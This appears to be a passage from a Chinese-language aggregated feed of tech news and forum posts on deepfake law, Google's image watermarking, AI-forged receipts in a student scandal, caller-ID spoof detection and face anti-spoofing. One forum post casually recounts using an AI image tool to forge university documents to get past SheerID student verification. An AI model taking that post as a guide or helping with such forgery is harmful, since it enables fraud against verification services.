则提醒,强制快速下架机制往往会诱导平台“宁可多删也不要少删”,以规避风险,引发系统性“过度审查”,从而伤害合法表达,包括 LGBTQ+ 群体的性别与性向相关内容,以及有关性教育和性别认同的教育材料。 在当前美国围绕跨性别青少年性别肯定医疗的政治氛围下,一些团体担忧该法会被当作进一步压缩相关信息的借口,即便最终被法院否决,其“寒蝉效应”也已形成。 与此同时,法律的适用范围同样存在灰区。 例如,X 平台集成的 AI 聊天机器人 Grok 在极短时间内生成了大量非自愿性化女性图像,但其中有多少构成法律意义上的“性露骨内容”、AI 工具开发者是否被视为“创作者”、以及私人生成而未公开传播的图像是否适用下架条款,仍缺乏明确答案。 司法部披露,在法案生效的第一年,仅在一起针对俄亥俄州男子的案件中援引了该法的刑事条款,以惩处其制作 AI 色情合成图像并骚扰受害者的行为,这也让外界质疑该法在实际保护受害者方面的效果是否有限。 在支持者看来,“下架法”为长期缺乏明确联邦框架的图像性暴力问题提供了必要的刑事工具和统一标准,有望压缩报复性色情和性深度伪造的传播空间。 但批评者则认为,在当前高度政治化的环境中,这样一部由行政机构掌握强大裁量权、又要求平台迅速删除内容的法律,非常容易在实践中偏离初衷,既未必真正惠及受害者,也可能在全球最大的社交媒体平台上催生新一轮有选择性的审查和噤声。 查看评论
随着AI图像生成技术日益强大,深度伪造和其他虚假图像变得越来越难以识别。尽管Google不断演进的Gemini套件在一定程度上助长了这一趋势,但该公司正试图通过更广泛地推广新的水印和检测系统来控制这项技术。 Google最新推出的AI图像编辑工具Google Pics旨在让照片修改变得前所未有地简单。该工具目前处于封闭测试阶段,计划在未来几个月内向更多用户开放。与此同时,Google正在扩大其SynthID和C2PA标记系统的使用范围,以便用户能够更轻松地区分未经编辑的照片和该公司工具生成的内容。 Google Pics基于Google最新的Nano Banana AI模型构建,可直接集成到Slides和Drive中。Google网站上的演示显示,该工具只需点击几次即可移动或删除对象、更换颜色、在保留原始字体的情况下编辑文字、改变图片的视觉风格,以及编辑照片背景以实现"缩小"效果。Google Pics将于今年夏天向AI Pro和Ultra订阅用户推出,同时面向Google Workspace企业用户的预览版也将同步上线。 在检测方面,SynthID验证功能现已在Google搜索中上线,并将在数周内登陆Chrome浏览器。SynthID于2023年推出,可在GoogleAI工具生成的图像、视频和音频中嵌入不可见的水印,使Gemini应用能够为用户标记这些内容。该功能目前可通过Google Lens和搜索的AI模式访问。为了将覆盖范围扩展到Google自身生态系统之外,英伟达去年已添加SynthID支持,OpenAI、Kakao和ElevenLabs也正在加入这一行列。 Google还在扩展C2PA技术,该技术可在拍摄真实照片的瞬间为其添加水印。这项技术首次亮相于Pixel 10的原生相机应用,很快将为Pixel 8、9和10手机的视频内容添加标记。Instagram也将很快支持C2PA标记。此外,Gemini应用从今天起可以识别C2PA水印,Google搜索和Chrome将在未来几个月内获得此功能。 这些只是2026年GoogleI/O大会公布的部分内容。该公司还发布了Google搜索的代理式升级、新款智能眼镜、对OpenClaw的回应以及AI驱动的购物车管理器等产品。 查看评论
昨天按着论坛里的方法,先后让image2伪造了台湾中央大学的缴费证明、学生证和学籍证明。 被SheerID怒退了三次,这下凉透了。 再见了我还没捂热的NotebookLM, 再见了我7天后重置的Antigravity, 以及被image2锤爆的nanobanana。 剧透 1 个帖子 - 1 位参与者 阅读完整话题
近日,上海交通大学国家电投智慧能源创新学院有学生实名反映,该院一名在校生在学科竞赛奖金分配过程中存在失信违规行为,引发校内热议。据了解,涉事学生樊某曾与同学组队参与首届全国 “AI + 能源”大学生科技创新竞赛并斩获赛事二等奖。 赛事5000元奖金早在今年二月初便已发放到位,但樊某一直向组队队友谎称奖金尚未下发,被多方追问后又刻意隐瞒实际金额,谎称奖金仅有 2000元,还出示了由 AI生成的虚假收款收据蒙蔽队友。 双方经学校学工办调解后,樊某承诺向队友补偿 4500 元,却迟迟没有兑现赔付承诺,相关矛盾最终被公开曝光。 事件发酵后,学院与校方第一时间高度重视,迅速成立专项工作组开展全面核查。 今日(18日)下午,该院发布情况通报,主要内容如下: 近日,有同学反映我院一名学生在相关竞赛的奖金分配中存在不当行为。学校、学院高度重视,成立专项工作组启动核查工作,现将有关情况通报如下: 经核查,我院樊同学与他人合作参加首届全国“AI+能源”大学生科技创新竞赛并获奖,在竞赛奖金分配中存在伪造收款记录、瞒骗奖金金额等不诚信行为。 经研究决定,给予樊同学严重警告处分,调整出入党积极分子队伍,终止其“荣昶储才计划”学员资格,取消其校内转专业拟录取资格。其本人已主动退出相关暑期学校。 查看评论
貌似是站内佬友的举报,没想到这能刷到后续 5月18日,上海交通大学国家电投智慧能源创新学院发布情况通报,全文如下: 近日,有同学反映我院一名学生在相关竞赛的奖金分配中存在不当行为。学校、学院高度重视,成立专项工作组启动核查工作,现将有关情况通报如下: 经核查,我院樊同学与他人合作参加首届全国“AI+能源”大学生科技创新竞赛并获奖,在竞赛奖金分配中存在伪造收款记录、瞒骗奖金金额等不诚信行为。 经研究决定,给予樊同学严重警告处分,调整出入党积极分子队伍,终止其“荣昶储才计划”学员资格,取消其校内转专业拟录取资格。其本人已主动退出相关暑期学校。 学校对不诚信行为坚持“零容忍”态度,一经核实必将依规严肃处理。感谢广大师生监督关注。 特此通报。 据现代快报报道,该院本科生樊同学与他人合作参加首届全国“AI+能源”大学生科技创新竞赛并获二等奖。赛后,樊同学在奖金分配中存在伪造收款记录、瞒骗奖金金额等不诚信行为。此前,合作同学通过校内平台发帖反映,樊同学多次称“奖金未发”,实际奖金5000元已于二月初到账;在被追问后,樊同学又谎称仅有2000元,并提供了一张标注“豆包AI生成”的虚假收据。经学工办调解,樊同学承诺补偿4500元,但始终未履行。 事件曝光后,学校、学院高度重视,立即成立专项工作组启动核查。经查实,学校依规对樊同学作出处理:给予严重警告处分;调整出入党积极分子队伍;终止其“荣昶储才计划”学员资格;取消其校内转专业拟录取资格。樊同学本人已主动退出相关暑期学校 转载自: https://mp.weixin.qq.com/s/uzN8pLN6l5CQHCK-INSR9g 5 个帖子 - 5 位参与者 阅读完整话题
IT之家 5 月 18 日消息,据科技媒体 Android Authority 今日报道,谷歌正在为 Android 系统电话应用开发伪造电话号码识别功能,在诈骗袭来时提供预警。 据报道,谷歌的电话应用已经拥有垃圾电话防护、号码识别和来电筛查等功能,可对抗营销骚扰电话或诈骗电话。 该媒体首先拆解了 Pixel 手机最新版谷歌电话应用(v222.0.913376317)的 APK 安装包,发现伪造电话号码检测功能相关痕迹,IT之家附代码如下: <code> <string name="incall_contact_checker_alert_title">This may not be %1$s</string> <string name="incall_contact_checker_alert_default_title">This may not be a real caller</string> <string name="incall_contact_checker_alert_description">"Someone may be pretending to call from your contact's number"</string> <string name="incall_contact_checker_alert_end_call_action">Hang up</string></code> 从上述代码来看,谷歌电话应用未来可在检测到伪造电话号码时提醒用户:“有人可能正在伪装成 XXX(IT之家注:联系人姓名)拨打电话”, 并提供挂断选项 。 事实上,伪造电话号码实施诈骗并不罕见,骗徒会通过技术手段, 让来电显示一个真实存在、甚至已经保存在用户通讯录里的号码 ,但实际上,真正拨打这个电话的号码并不是屏幕显示的号码,而是另有其人。骗子正是利用了熟人的信任心理,攻破用户防线。 此前曾有传闻称,谷歌正在开发一套电话号码验证机制,自动验证电话号码的真实性并识别虚假号码,必要时直接挂断通话。但无论如何,Pixel 手机在处理可疑电话方面已经拥有不错口碑。
请教 rgb 摄像头有防止人脸伪造 [打印照片或电子照片] 的方法吗? 是一个安卓的项目,在网上找了下没找到好的方法,特来请教 V 友大佬
请教 rgb 摄像头有防止人脸伪造 [打印照片或电子照片] 的方法吗? 是一个安卓的项目,在网上找了下没找到好的方法,特来请教 V 友大佬
请教 rgb 摄像头有防止人脸伪造 [打印照片或电子照片] 的方法吗? 是一个安卓的项目,在网上找了下没找到好的方法,特来请教 V 友大佬